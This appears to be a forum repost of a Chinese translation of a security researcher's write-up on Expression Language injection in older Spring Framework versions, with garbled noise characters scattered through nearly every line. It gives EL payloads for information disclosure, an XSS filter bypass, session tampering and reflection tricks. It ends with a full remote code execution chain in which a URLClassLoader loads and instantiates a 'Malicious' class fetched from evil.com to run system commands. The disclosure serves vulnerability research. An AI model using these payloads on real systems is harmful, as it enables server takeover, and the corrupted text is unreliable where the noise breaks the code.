Remote Code with V8 Z1 q1 R# C, }6 D1 h4 w* l
Expression Language Injection
! W) o* `! x0 J1 b2 DSpring Framework脆弱性—DanAmodio% `" V; d% S4 T4 A1 `3 b3 d
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
0 G: D7 c0 v# o, m# |2 r; C可能会存在风险。
/ ^, y0 r5 y, _1 G" I$ \7 C在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
$ l& {: R4 a1 [5 PArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
7 O0 L* `. M7 z$ s( U$ f/ m. ]以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持," X, v7 ^8 S+ E& U' _& }5 P
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前8 F/ j$ E% l2 g6 z3 }6 X2 l7 K4 m
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
4 z; p E0 |, i4 J, o& ^! W7 ~3 }6 U% o由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但4 @$ D! Q; H5 N& O) n5 ]" x
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版# A j3 T6 Y) o* S/ V/ _4 {
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
* F# d6 {+ R/ `* Z这些版本不支持禁用double EL resolution., }) ~- b, ]& t7 n4 q" R! P" z$ X
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含+ S. M2 G3 N* {# j0 m
EL2.2容器上可能进行远程代码执行。
# f& V' H/ Q+ s6 d这是一个原始信息泄露的攻击例子:
0 x& _& w( j) Z/ M9 z请求:
% l6 B: u* t" W- i4 k$ W2 Vttp://vulnerable.com/foo?message=${applicationScope}, E i0 m4 j1 C `+ V0 j
到达以下内容页面:3 Z8 x. m: O; i9 r$ ?5 v
结果将输出一些包含内部服务器信息calsspath 和本地工作目录5 p% Y) C; I7 r, ~ m0 @
你也可以做一些其他事情,如这样:
8 r0 J2 R! b5 o" g$ P) M) b* ?${9999+1}
/ R: A( [; P6 V还可以访问session 对象和beans3 D+ @3 }3 v, R. R
${employee.lastName}
1 c3 s, {2 J7 S在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是6 l) U# a) P& ]/ O R1 E
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东. n8 |- @: ^" y* A
西,比如XSS.
- t: c' b* q1 x' C- q哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签3 q( A0 m5 [2 V8 A& k
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
- ?+ A0 _( A: Z呢?”
! B1 x5 M+ r z4 [# Y因此,我尝试巳缦拢�, t; A7 S8 w8 |9 X" X9 z1 b* ~
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
# C/ D" g3 x( f( BP
, y$ ]& a. i2 C我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
6 S* D# U; y: Y6 k回的文本被插入进了spring:message 标签。
9 `+ D' }( {) u9 p( K; q0 G5 A! Z0 I这里是一个最终绕过过滤的实例:
/ V) C; d1 Y4 ]- ^http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
' D7 A% X7 F$ `* f) [它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
5 h4 G2 A0 e* T. R! R什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?5 D+ U' ]$ m C; `+ \
经过一番研究,我学习到EL2.2 增加了方法调用。
$ [ Z7 l/ m0 p* |9 f1 P; O我写了一个快速测试应用程序代码并且检测一些功能- h8 Q1 V; P4 Z) Y& N' ?2 O
${pageContext.request.getSession().setAttribute(“account”,”123456″)}! t5 e: `: p5 Y% A; m# ]0 s
${pageContext.request.getSession().setAttribute(“admin”,true)}
- I0 F6 U9 B, i2 Q6 R+ q- F: V好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
( I0 b7 r7 L' F' ?/ h指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
) f% V3 K5 z, `${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.17 h) C+ a: ~- ^ r6 k; x# v5 b+ P
“, 1234)}
/ o, [9 @! V3 V7 q+ j${“”.getClass().forName(“java.lang.Runtime”)}8 n, `0 { K- s) F
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不" o6 L+ n, n3 S" u* w* m4 ]
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
4 w: B0 O! a5 I0 G* j3 e数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有1 y; ?3 K+ n6 M
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于; K( H, t7 T3 I; A& x. F
方法签名invoke(Object obj, Object„ args)
) b" P# [# ~, O" P7 C' b! wJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问2 C. g& X) g. n+ {0 y$ k5 r
题,以让它可以工作起来。# Q x" T3 J* |. a2 A7 H4 r
漏洞利用:
' k1 R0 _8 e6 S8 ^( [我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
! Y" O* n# I- s: y7 r希望你们中的一些JAVA奇才告诉我我是如此的可笑。
. ^, u* i" M6 R这里有一些我试过的失败的用例,为了试图让它工作的用例:
+ l* _" `8 s ^, } 写文件到文件系统5 d% i* ?' w% s% p1 N$ s1 B. [
试图载入org.springframework.expression.spel.standard.SpelExpressionParser." q3 a1 r9 J v( j" d" \4 V
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
9 X! v5 x6 O# m+ P! D$ T. W, P9 s${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}/ d/ e1 D2 ~9 l% }
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
- B& W3 X! `2 E- W) Gorg.springframework.expression.spel.standard.SpelExpressionParser not found
6 @' y3 J" ?" E. gby1 D' u. W, q' j6 |/ Q* ^) g$ K
org.glassfish.web.javax.servlet.jsp [194].
9 H# `0 _" u7 w# a; I0 s" a 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
2 ^9 Z) O# P- Z7 f" O/ I1 B3 z6 J 利用反射来创建一个新的Runtime(and watch the world burn)
" g D9 T( Q8 \3 E: R( j${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
/ y+ @! z; u7 l(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
3 l/ D n: u/ [5 r: S) r' X4 p% m${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}8 y3 l e5 P) n8 b2 X. g" q* T
使用java.lang.ProcessBuilder+ h9 k7 W) m# K$ y2 ~
用表达式语言来评估表达式语言
7 p& n+ D7 \6 Q' q' EExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
: E& c: Y, R/ `) J${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
+ e* s# e, R+ O/ v$ C“,”".getClass(),null)}. ]4 ^1 ]% p& B/ y& J9 a& m2 u2 Y3 W
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
- r5 S) R6 D* T* K我在使用一个空数组通过Method.invoke()时失败了很多次) c- R: ], \! a3 H
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo/ C+ b* E" n8 H8 b: U( Q
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A: ~1 [. F( l" r# Y: h* E' C# ~+ w
rrayList”).newInstance().toArray())
6 b( K8 R* b/ b/ G9 h( Djava.lang.IllegalArgumentException: wrong number of arguments
S0 j4 s. @) O5 x9 {; m最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
- N* v) l$ P" [8 |; a% W5 o. y) N3 J以创建一个恶意class文件并且指向类装载器." i0 m9 R$ ?9 }& X k, M+ j0 f
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
6 w, ]$ E0 F8 f/ W3 x$ w# ?( apublic class Malicious {
m& ~* ]0 E* ^) ]( E) Hpublic Malicious() {* B4 i; N! ?3 y$ s. g1 @
try {% I4 b& S1 X3 m! W+ G8 d
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac& j8 S( t8 G4 {: G% O/ i2 p" s
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win/ m4 e7 B- c5 S% F
} catch (Exception e) {9 D( a; t2 @8 e2 |- ]1 z
}
( S9 q. ^ D& ]$ z8 y0 @/ G}, B: |! M/ f6 D2 `1 ]
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
5 W& X. S1 T& F" r6 n7 U话中,因此它可以被使用.* P- ]3 U! L+ p$ V/ k' V t
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
: K% z: X! X, P) Y9 k6 i(“java.util.ArrayList”).newInstance())}2 U6 ^0 W1 K' H' g9 a
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
0 b( A. o0 w: w7 W一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
5 ^" @5 c0 y8 v) h( e! `getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
S" S$ l' ~6 G4 {2 X% ~我们可以调用的create(string)方法,然后转换对一个URL对象。6 d( {" b. i; C" x4 h; f% @- D
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
) R% M* z4 M' W' F7 q7 iere/malicious/classfile/is/located/”).toURL())}
% K) o( T) g' z, J {, w然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
; V, {0 p/ x8 r* w8 k* P, }恶意类文件被装载并创建,触发远程代码.5 E2 A$ O% I1 A$ }% P+ K
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte0 o) O/ Z$ z6 G3 G* D+ c- c
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().0 B; ?1 v3 g+ J( G' D3 d6 X' U# C6 q
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance" M. O L% x5 c" a
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对